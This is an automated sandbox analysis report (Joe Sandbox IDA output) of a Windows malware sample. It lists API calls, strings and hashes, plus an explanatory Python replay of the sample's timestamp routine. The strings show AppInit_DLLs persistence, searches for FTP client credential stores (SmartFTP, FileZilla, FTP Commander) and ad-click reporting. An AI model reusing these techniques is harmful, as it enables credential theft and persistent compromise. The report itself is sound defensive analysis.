                                                                                                                                                                                                                  • Part of subcall function 00409FB1: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                                                                                                                                                                                                                  • Part of subcall function 00409FB1: DispatchMessageW.USER32(?), ref: 0040A009
                                                                                                                                                                                                                Strings
Memory Dump Source
• Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
Similarity
• API ID: String$AllocCountFreeMessageTick$DispatchPeekSleep_memset
• String ID: J(@
• API String ID: 3143865713-2848800318
APIs
• RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Windows,00000000,00000001,?,?,00000000), ref: 00408628
• GetLastError.KERNEL32(?,00000000), ref: 0040864A
  • Part of subcall function 004069C0: RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,75B4E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
  • Part of subcall function 004069C0: RegCloseKey.KERNEL32(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
• DeleteFileW.KERNEL32(C:\WINDOWS\system32\gbdwpbm.dll,?,00000000), ref: 00408687
  • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
Similarity
• API ID: CloseCreateDeleteErrorFileLastOpenQueryValue
• String ID: AppInit_DLLs$C:\WINDOWS\system32\gbdwpbm.dll$Software\Microsoft\Windows NT\CurrentVersion\Windows
• API String ID: 4026185228-3265104503
APIs
• SysAllocString.OLEAUT32(?), ref: 00409B00
• SysAllocString.OLEAUT32(?), ref: 00409B0E
Similarity
• API ID: AllocString
• String ID: </title>$</url>$<title>$<url>
• API String ID: 2525500382-2286408829
APIs
  • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
• Sleep.KERNEL32(00002710,?,?,?,?,00402C8F,00000032,00000000,00000000,00000000,00000000,?), ref: 0040A91C
• Sleep.KERNEL32(00002710), ref: 0040AAC1
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040AAE9
• HeapFree.KERNEL32(00000000), ref: 0040AAF0
Strings
• jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s, xrefs: 0040A957
• 0, xrefs: 0040AA5B
Similarity
• API ID: HeapSleep$AttemptConnectFreeInternetProcess
• String ID: 0$jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s
• API String ID: 3713053250-1268808612
APIs
• GetLocalTime.KERNEL32(?,?), ref: 004074AD
• GetLocalTime.KERNEL32(00000000), ref: 004074B3
• GetTimeZoneInformation.KERNEL32(?), ref: 004074EA
• SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407525
• SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040752F
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040754A
Similarity
• API ID: Time$FileLocalSystem$InformationUnothrow_t@std@@@Zone__ehfuncinfo$??2@
• String ID:
• API String ID: 3777474486-0
APIs
• CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 004083DC
• GetFileSizeEx.KERNEL32(00000000,?), ref: 004083EF
• VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00408417
• ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040842F
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 00408449
• CloseHandle.KERNEL32(?), ref: 00408452
Similarity
• API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
• String ID:
• API String ID: 1974014688-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • InternetConnectW.WININET(?,00000050,00000000,00000000,00000003,00000000,00000000,?), ref: 00409EA3
                                                                                                                                                                                                                • HttpOpenRequestW.WININET(00000000,POST,04400100,00000000,00000000,00000000,04400100,00000000), ref: 00409EC3
                                                                                                                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,?,?), ref: 00409EDA
                                                                                                                                                                                                                • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00409F00
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HttpInternetRequest$ConnectFileOpenReadSend
                                                                                                                                                                                                                • String ID: POST
                                                                                                                                                                                                                • API String ID: 961146071-1814004025
                                                                                                                                                                                                                • Opcode ID: 20f9c5eacef7b48b8181bad7e01822bf71c4addd269446e4957b1a187c5c6ded
                                                                                                                                                                                                                • Instruction ID: 440a75f1c6cd1a7483e62584c22426b42aa3ce760e55699d8a89a0e8c7b72afb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 20f9c5eacef7b48b8181bad7e01822bf71c4addd269446e4957b1a187c5c6ded
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B8318E71900119BFDB10DBA4DC84EFE7679EB54349F14087AFA41B62C2D6385E448BA8
APIs
  • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
• ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,?,00000008), ref: 004051EB
Strings
• SOFTWARE\smartftp\client 2.0\settings\backup, xrefs: 00405168
• SOFTWARE\smartftp\client 2.0\settings\general\favorites, xrefs: 00405157
• folder, xrefs: 00405184
• personal favorites, xrefs: 00405176
Memory Dump Source
• Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
Similarity
• API ID: EnvironmentExpandOpenStrings
• String ID: SOFTWARE\smartftp\client 2.0\settings\backup$SOFTWARE\smartftp\client 2.0\settings\general\favorites$folder$personal favorites
• API String ID: 3923277744-821743658
• Opcode ID: e843f97767911fec9b6fd3034691d6ab50a9750596cd8693bb12be5acb83529b
• Instruction ID: 0454e2dbaba930a1c05830d090df37f1eb9a44f33d61805f8e12f109ce5a2445
• Opcode Fuzzy Hash: e843f97767911fec9b6fd3034691d6ab50a9750596cd8693bb12be5acb83529b
• Instruction Fuzzy Hash: 21213E71D00518ABDB10EB95DC41ADFB7BCEB44318F1084B7E514B2181EB389B49CFA9
APIs
• CoInitialize.OLE32(00000000), ref: 0040A0C0
• GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
• CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
Strings
Memory Dump Source
• Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
Similarity
• API ID: CreateHandleInitializeModuleWindow
• String ID: AtlAxWin$Shell.Explorer
• API String ID: 950422046-1300462704
• Opcode ID: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
• Instruction ID: 8885d0d040d3ab3e1edd42f45155a7fe84e7bff231f75e8e802cb7627400a982
• Opcode Fuzzy Hash: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
• Instruction Fuzzy Hash: 78118F30200200FFD320ABA6CC4CE6B7BBCEFCA711B240579F515EB291D7789801CA65
APIs
• GetSystemTime.KERNEL32(?,?,000003E8,?,?,?,?,?,?,?,?,?,?,?,00407B63,?), ref: 0040727C
• SystemTimeToFileTime.KERNEL32(?,?,?,000003E8,?), ref: 004072C1
• SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 004072CB
• __aulldiv.LIBCMT ref: 004072E3
Strings
Memory Dump Source
• Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
Similarity
• API ID: Time$System$File$__aulldiv
• String ID: c{@
• API String ID: 3735792614-264719814
• Opcode ID: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
• Instruction ID: ef19eb4ac8525f4bf2260e0142840e6d018c3cac6eb9bd4f47b1f5cd165e8a78
• Opcode Fuzzy Hash: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
• Instruction Fuzzy Hash: D401DE62D1022DAACB01DFE4D984CEFB77DFF44348B00156AE901F7250E7B5AA4887A5
APIs
• GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040286E), ref: 004072F9
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00407337
• SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 00407341
• __aulldiv.LIBCMT ref: 00407359
Strings
Memory Dump Source
• Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
Similarity
• API ID: Time$System$File$__aulldiv
• String ID: n(@
• API String ID: 3735792614-2525614082
• Opcode ID: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
• Instruction ID: 0875687ad9f8fbdff1f190dbab39d4211c2ed1a8acd2afdabfbd9ccbaffc37b8
• Opcode Fuzzy Hash: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
• Instruction Fuzzy Hash: 83011A66D2022DAACF00DBE5DD44CEFB7BCFF44344B04051AE901B3210E7B5A648CBA9
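Both GetSystemTime blocks above convert the current time to a FILETIME, convert a second SYSTEMTIME whose first dword is 000007B2 (wYear = 1970) to a FILETIME, and then call __aulldiv. That is the usual shape of a Unix-epoch timestamp routine: subtract the FILETIME of 1970-01-01 from the current FILETIME and divide the 100-nanosecond tick count by a constant. The divisor itself is not visible in the listing, so whether the result is seconds (divide by 10,000,000) or milliseconds (divide by 10,000; the 000003E8 = 1000 on the stack of the first variant hints at millisecond scaling) is an inference, not something the report states. The following pure-Python replay is an added example, not code from the sample or from Joe Sandbox; it reimplements SystemTimeToFileTime and __aulldiv so the arithmetic can be checked offline.

```python
from datetime import datetime, timezone

TICKS_PER_SECOND = 10_000_000        # FILETIME resolution is 100 ns
TICKS_PER_MS = 10_000
MASK64 = 0xFFFFFFFFFFFFFFFF
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def system_time_to_file_time(year, month, day, hour=0, minute=0, second=0, ms=0) -> int:
    """Pure-Python SystemTimeToFileTime: 100-ns ticks since 1601-01-01 UTC as a 64-bit int."""
    dt = datetime(year, month, day, hour, minute, second, ms * 1000, tzinfo=timezone.utc)
    delta = dt - FILETIME_EPOCH
    return ((delta.days * 86400 + delta.seconds) * TICKS_PER_SECOND
            + delta.microseconds * 10)


def aulldiv(dividend: int, divisor: int) -> int:
    """__aulldiv: unsigned 64-bit division, operands and result truncated to 64 bits."""
    return ((dividend & MASK64) // (divisor & MASK64)) & MASK64


def time_since_1970(now: datetime, divisor: int = TICKS_PER_SECOND) -> int:
    """Replays the observed call sequence: FILETIME(now) - FILETIME(1970-01-01), then __aulldiv.

    `divisor` is an assumption: the report does not show the constant the sample divides by.
    """
    ft_now = system_time_to_file_time(now.year, now.month, now.day,
                                      now.hour, now.minute, now.second,
                                      now.microsecond // 1000)
    ft_1970 = system_time_to_file_time(0x7B2, 1, 1)   # 0x7B2 == 1970, the wYear seen on the stack
    return aulldiv(ft_now - ft_1970, divisor)


if __name__ == "__main__":
    sample_time = datetime(2024, 10, 31, 12, 0, 0, tzinfo=timezone.utc)   # constructed input
    print("FILETIME(1970-01-01) =", system_time_to_file_time(1970, 1, 1))
    print("seconds since 1970   =", time_since_1970(sample_time))
    print("milliseconds         =", time_since_1970(sample_time, TICKS_PER_MS))
```

The FILETIME of 1970-01-01 comes out as 116444736000000000, the well-known constant used by every FILETIME-to-time_t conversion, which is a quick way to confirm in a debugger that the second SystemTimeToFileTime call is producing the epoch reference rather than some other date.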
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040AB93
• CharLowerW.USER32(?), ref: 0040ABA0
• GetCommandLineW.KERNEL32 ref: 0040ABC0
Strings
Memory Dump Source
• Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
Similarity
• API ID: CharCommandFileLineLowerModuleName
• String ID: /updatefile3$netprotdrvss.exe
• API String ID: 3118597399-3449771660
• Opcode ID: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
• Instruction ID: 1eba2a713c21f7c79877a49aa3ec6850c44e44909145826ab611dd80b60fa5a6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41E09B3655021A5AD750FBB1DD07BA633ACFB01705F1049B6A246F10C0EE74D55D4F9D
APIs
• GetTickCount.KERNEL32 ref: 00409FCE
• GetTickCount.KERNEL32 ref: 00409FDE
• Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
• DispatchMessageW.USER32(?), ref: 0040A009
Similarity
• API ID: CountMessageTick$DispatchPeekSleep
• String ID:
• API String ID: 4159783438-0
• Opcode ID: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
• Instruction ID: c0dc46c0c87f7bc49602bd7d2efae9f565a6f52602c3eafe7569a8fa2f6b8eea
• Opcode Fuzzy Hash: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
• Instruction Fuzzy Hash: 3F118671D103199ECB10AFF5CC8899F7BB9BB45314B144A7AE161F71E0C778CA118B1A
APIs
• GetTickCount.KERNEL32 ref: 00409F5B
• GetTickCount.KERNEL32 ref: 00409F5F
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
• DispatchMessageW.USER32(?), ref: 00409F80
• Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D
Similarity
• API ID: CountMessageTick$DispatchPeekSleep
• String ID:
• API String ID: 4159783438-0
• Opcode ID: ab27e8fd20f0983608bc295b19996ec13099b56f87bcdccced181fb1a6008d05
• Instruction ID: 2f378a1af0056e794f94b22e0cd08b0b0b180d2e60cd5d2ebdc62f673b65dbb1
• Opcode Fuzzy Hash: ab27e8fd20f0983608bc295b19996ec13099b56f87bcdccced181fb1a6008d05
• Instruction Fuzzy Hash: D1F0C872D042149BD714B7F2DD09B7D76A89B45714F104A36F551F70D1CA7CCD148A58
APIs
  • Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
  • Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551
  • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5B
  • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5F
  • Part of subcall function 00409F2B: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
  • Part of subcall function 00409F2B: DispatchMessageW.USER32(?), ref: 00409F80
  • Part of subcall function 00409F2B: Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D
• CharLowerW.USER32(?,?,?,00423DD4,?,00000001), ref: 00408751
• SysFreeString.OLEAUT32(?), ref: 0040875A
Strings
Similarity
• API ID: CountInternetMessageTick$CharDispatchFreeLowerOpenOptionPeekSleepString
• String ID: http://$+@
• API String ID: 147727044-3628382792
• Opcode ID: 6e9e626a4613c0855f5347982540e942ed1617b6e834c0e4f94aa1f1be06abb5
• Instruction ID: 305e6509dfdc939f3ffb47eba37a7af79922f54013ecb7534e3961c93d2e4cc1
• Opcode Fuzzy Hash: 6e9e626a4613c0855f5347982540e942ed1617b6e834c0e4f94aa1f1be06abb5
• Instruction Fuzzy Hash: 4E41D5729002199BCF15AF66CD056EFBBB4FF44314F20447FE981B3292DB3889528B99
APIs
• SetFilePointer.KERNEL32(00414F68,00000000,00000000,00000000,UniqueNum,00000001), ref: 00407E09
• WriteFile.KERNEL32(00000078,00000064,00000001,00000000), ref: 00407E20
  • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
  • Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
Strings
Similarity
• API ID: File$CreateModuleNamePointerWrite
• String ID: UniqueNum$x
• API String ID: 594998759-2399716736
• Opcode ID: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
• Instruction ID: 8c5cde1ed6458afa5e70834db293a7f07ca8c6efd1b8e13f0da2095665a79c5a
• Opcode Fuzzy Hash: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
• Instruction Fuzzy Hash: F72129329002186BDF04AB74ED49DDF3B69EF44315F104636FA02E71E1E634D951C799
APIs
• SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 0040413A
  • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
  • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
  • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
  • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
  • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
  • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
  • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
Strings
Similarity
• API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
• String ID: #$&$*filezilla*
• API String ID: 3438805939-758400021
• Opcode ID: 7f420262a527ace9c0fec2a61cbcbac63df6dda7f3825d1df3812bb47b8bab04
• Instruction ID: af0dd5899ef73ee7264a7e51d90439c8fcf38b6470501fb51340e8e2557856c3
• Opcode Fuzzy Hash: 7f420262a527ace9c0fec2a61cbcbac63df6dda7f3825d1df3812bb47b8bab04
• Instruction Fuzzy Hash: 8E1151B2901128BADB10EA92DC49EDF7BBCEF85304F00407AF605B6080E7385785CBE9
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 00404AE5
                                                                                                                                                                                                                  • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                                                                                                                                                                                                                  • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                                                                                                                                                                                                                  • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                                                                                                                                                                                                                  • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                                                                                                                                                                                                                  • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                                                                                                                                                                                                                  • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                                                                                                                                                                                                                  • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                                                                                                                                                                                                                • String ID: #$&$ftp*commander*
                                                                                                                                                                                                                • API String ID: 3438805939-1149875651
                                                                                                                                                                                                                • Opcode ID: 371d79112eeabe7a5308543586f4c365cccc6d4de9a1601f9ce447be0e8ea6cb
                                                                                                                                                                                                                • Instruction ID: 4761086559ade70d73b1403ca51e5d3bc462c500c99379e4fd01d7d946a964d6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 371d79112eeabe7a5308543586f4c365cccc6d4de9a1601f9ce447be0e8ea6cb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B61121B2901118BADB10AA92DC49EDF7F7CEF85704F00407AF609B6180E7799785CBA9
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 004094A9
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 004094AE
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FreeString
                                                                                                                                                                                                                • String ID: _blank$an.yandex.ru/count
                                                                                                                                                                                                                • API String ID: 3341692771-25359924
                                                                                                                                                                                                                • Opcode ID: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
                                                                                                                                                                                                                • Instruction ID: 1eacecae91598e8b756cf85833a4a3bbf756f1dfdfc5fa02fd6c22f827bf3b29
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 28015A35204114BBDB109FA6CD05D9B77A8EF85324724443BBC15E7291E779EE02CA69
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00409868
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00409876
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocString
                                                                                                                                                                                                                • String ID: "URL"$"encrypted"
                                                                                                                                                                                                                • API String ID: 2525500382-4151690107
                                                                                                                                                                                                                • Opcode ID: f6e867073f93e28a707ce71cee5b1d0d556dab41e30d3c647449298916898aec
                                                                                                                                                                                                                • Instruction ID: 961e294ab5ae80d7ab2f0271a6faa46f3ea3f555f1d55132cdad114d364c87da
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f6e867073f93e28a707ce71cee5b1d0d556dab41e30d3c647449298916898aec
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62F0D671A0021DA7CF00AB69CC01FD637ECAB4438CF1484B6F904F32C1E974EA098B98
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 004097ED
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 004097FB
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocString
                                                                                                                                                                                                                • String ID: "domain"$"url"
                                                                                                                                                                                                                • API String ID: 2525500382-2438671658
                                                                                                                                                                                                                • Opcode ID: 98133a6a8bfb7a18a2a86276567a63b94d588fd2e230135a268bf1c7eb2bd3b5
                                                                                                                                                                                                                • Instruction ID: 610bf4d9b2292206f8ef054453b19a236663fc5a2da35db14ea77673b97cd822
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 98133a6a8bfb7a18a2a86276567a63b94d588fd2e230135a268bf1c7eb2bd3b5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08F0A271A0021DA6CF41AAA9CC05FD637E8AB44348F1444B6F908F7281EA78EA188B94
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Internet Explorer,00000000,00000001,00000000,?,?,00402C77), ref: 00406C91
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
